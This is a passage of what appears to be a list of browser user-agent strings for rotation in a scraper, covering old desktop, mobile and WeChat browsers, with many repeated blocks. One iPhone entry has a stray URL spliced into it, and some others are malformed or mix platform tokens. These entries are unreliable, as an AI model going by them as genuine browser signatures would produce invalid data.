'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
